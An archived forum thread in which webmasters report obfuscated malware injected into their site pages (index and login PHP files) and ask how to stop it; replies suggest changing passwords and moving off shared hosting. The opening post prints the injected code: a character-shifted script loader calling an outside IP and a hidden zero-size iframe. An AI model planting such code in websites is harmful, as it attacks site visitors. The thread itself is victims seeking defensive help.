homepage Welcome to WebmasterWorld Guest from
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Visit PubCon.com
Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
Forum Library, Charter, Moderators: phranque

Website Technology Issues Forum

Malware Traps?

 12:32 pm on Apr 23, 2009 (gmt 0)

Not sure if this is the right place for this.

I recently got nailed by Google on some of my sites. They categorized my sites as "malware." Bizarre to say the least. I have been operating these sites for almost ten years. Anyway, I found a strange piece of code at the bottom of one of my pages:

<!-- ad --><html><script>
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
/*@end @*/
</script></html><!-- /ad --><!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://example.com/trf.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script><!-- counter -->

I have no idea how this happened. Has anyone had this happen to them? HOW can this get on there? I want to prevent this kind of thing from happening in the future.

[edited by: engine at 7:34 pm (utc) on April 24, 2009]
[edit reason] examplified [/edit]



 12:56 pm on Apr 23, 2009 (gmt 0)

This just happened to me also, any help would be greatly appreciated. Mine was a PunBB forum


 1:05 pm on Apr 23, 2009 (gmt 0)

This is the exact same code found on my index and login php pages. EXACT. Not cool.


 3:56 pm on Apr 23, 2009 (gmt 0)

Well I did not do it! lol


 4:30 pm on Apr 23, 2009 (gmt 0)

what type of site was it?


 11:14 am on Apr 24, 2009 (gmt 0)

Also had similar code added to a couple of sites recently,
'mysite.co.uk' and 'mysite.com'.
The 'mysite.co.uk' is a regional u.k. tourism site
and the 'mysite.com' is where i do my future development.

Both sites are on the same server located in the u.k.

Have now changed the passwords.




 7:35 pm on Apr 26, 2009 (gmt 0)


I also had the same thing,

i deleted the codes and after 2 days it was up again on the index.php and login.php file on my site,

does anyone know what this is?


 8:59 pm on Apr 26, 2009 (gmt 0)

Looks like you have been hacked with code that does something nasty when a visitor looks at the page.

That sort of attack is getting much more common; wordpress and other similar products have been targeted several times.

There's a lot of advice in previous threads. You need to go beyond cleaning out the code and changing the passwords. There is some fundamental loophole that the miscreants are taking advantage of.


 9:01 am on Apr 28, 2009 (gmt 0)

The 'mysite.com' site was again attacked yesterday,
and google has blocked this site.

Regards Neil


 9:55 am on Apr 28, 2009 (gmt 0)

Shared hosting or VPS/dedicated?

If shared hosting, move to another hosting company. With shared hosting you have only limited possibilities to close such holes and with shared hosting many times the problem is caused by the hosting provider rather then the website operator.


 6:37 am on Apr 29, 2009 (gmt 0)

Using shared hosting,
does VPS provide a higher level of security.
Is it still open to hackers adding malicious code?

Regards Neil

Global Options:
 top home search open messages active posts  

Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved